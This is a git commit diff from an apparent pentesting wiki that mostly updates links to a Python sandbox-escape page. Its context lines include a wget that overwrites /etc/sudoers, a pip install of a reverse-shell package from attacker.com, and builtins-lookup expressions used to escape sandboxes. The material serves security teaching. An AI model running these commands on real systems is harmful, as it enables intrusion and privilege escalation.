GitBook: [master] 8 pages modified

This commit is contained in:
CPol 2021-10-06 10:13:49 +00:00 committed by gitbook-bot
parent 74aea447ea
commit 41edae0cc8
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
7 changed files with 22 additions and 11 deletions

View file

@ -550,7 +550,8 @@
* [Basic Python](misc/basic-python/README.md)
* [venv](misc/basic-python/venv.md)
* [Bypass Python sandboxes](misc/basic-python/bypass-python-sandboxes.md)
* [Bypass Python sandboxes](misc/basic-python/bypass-python-sandboxes/README.md)
* [Output Searching Python internals](misc/basic-python/bypass-python-sandboxes/output-searching-python-internals.md)
* [Magic Methods](misc/basic-python/magic-methods.md)
* [Web Requests](misc/basic-python/web-requests.md)
* [Bruteforce hash \(few chars\)](misc/basic-python/bruteforce-hash-few-chars.md)

View file

@ -136,7 +136,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
Tricks about escaping from python jails in the following page:
{% page-ref page="../../misc/basic-python/bypass-python-sandboxes.md" %}
{% page-ref page="../../misc/basic-python/bypass-python-sandboxes/" %}
## Lua Jails

View file

@ -47,7 +47,7 @@ Remember that the _**open**_ and _**read**_ functions can be useful to **read fi
Python try to **load libraries from the current directory first** \(the following command will print where is python loading modules from\): `python3 -c 'import sys; print(sys.path)'`
![](../../.gitbook/assets/image%20%28533%29.png)
![](../../../.gitbook/assets/image%20%28533%29.png)
## Bypass pickle sandbox with default installed python packages
@ -83,7 +83,7 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
{% file src="../../.gitbook/assets/reverse.tar.gz" %}
{% file src="../../../.gitbook/assets/reverse.tar.gz" %}
{% hint style="info" %}
This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
@ -173,7 +173,7 @@ get_flag.__globals__['__builtins__']
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]
```
[**Below there is a bigger function**](bypass-python-sandboxes.md#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**.
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**.
#### Python2 and Python3
@ -221,7 +221,7 @@ class_obj.__init__.__globals__
[<class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'reprlib.Repr'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'rlcompleter.Completer'>, <class 'dis.Bytecode'>, <class 'string.Template'>, <class 'cmd.Cmd'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'bdb.Bdb'>, <class 'bdb.Breakpoint'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '__future__._Feature'>, <class 'codeop.Compile'>, <class 'codeop.CommandCompiler'>, <class 'code.InteractiveInterpreter'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>]
```
[**Below there is a bigger function**](bypass-python-sandboxes.md#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**.
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**.
## Discover Arbitrary Execution
@ -371,7 +371,7 @@ This is just **awesome**. If you are **looking for an object like globals, built
{% endhint %}
```python
import os, sys
import os, sys # Import these to find more gadgets
SEARCH_FOR = {
# Misc
@ -486,6 +486,10 @@ if __name__ == "__main__":
main()
```
You can check the output of this script in this page:
{% page-ref page="output-searching-python-internals.md" %}
## Python Format String
If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example.

File diff suppressed because one or more lines are too long

View file

@ -107,7 +107,7 @@ print(base64.b64encode(pickle.dumps(P())))
For more information about escaping from **pickle jails** check:
{% page-ref page="../../misc/basic-python/bypass-python-sandboxes.md" %}
{% page-ref page="../../misc/basic-python/bypass-python-sandboxes/" %}
## NodeJS

View file

@ -550,7 +550,7 @@ home = pugjs.render(injected_page)
Check out the following page to learn tricks about **arbitrary command execution bypassing sandboxes** in python:
{% page-ref page="../../misc/basic-python/bypass-python-sandboxes.md" %}
{% page-ref page="../../misc/basic-python/bypass-python-sandboxes/" %}
### Tornado \(Python\)
@ -745,7 +745,7 @@ Bypassing most common filters \('.','\_','\|join','\[','\]','mro' and 'base'\) b
#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
* Check [attr trick to bypass blacklisted chars in here](../../misc/basic-python/bypass-python-sandboxes.md#python3).
* Check [attr trick to bypass blacklisted chars in here](../../misc/basic-python/bypass-python-sandboxes/#python3).
### Mako \(Python\)

View file

@ -10,7 +10,7 @@ test a possible **code execution**, using the function _str\(\)_:
### Tricks
{% page-ref page="../../misc/basic-python/bypass-python-sandboxes.md" %}
{% page-ref page="../../misc/basic-python/bypass-python-sandboxes/" %}
{% page-ref page="../../pentesting-web/ssti-server-side-template-injection/" %}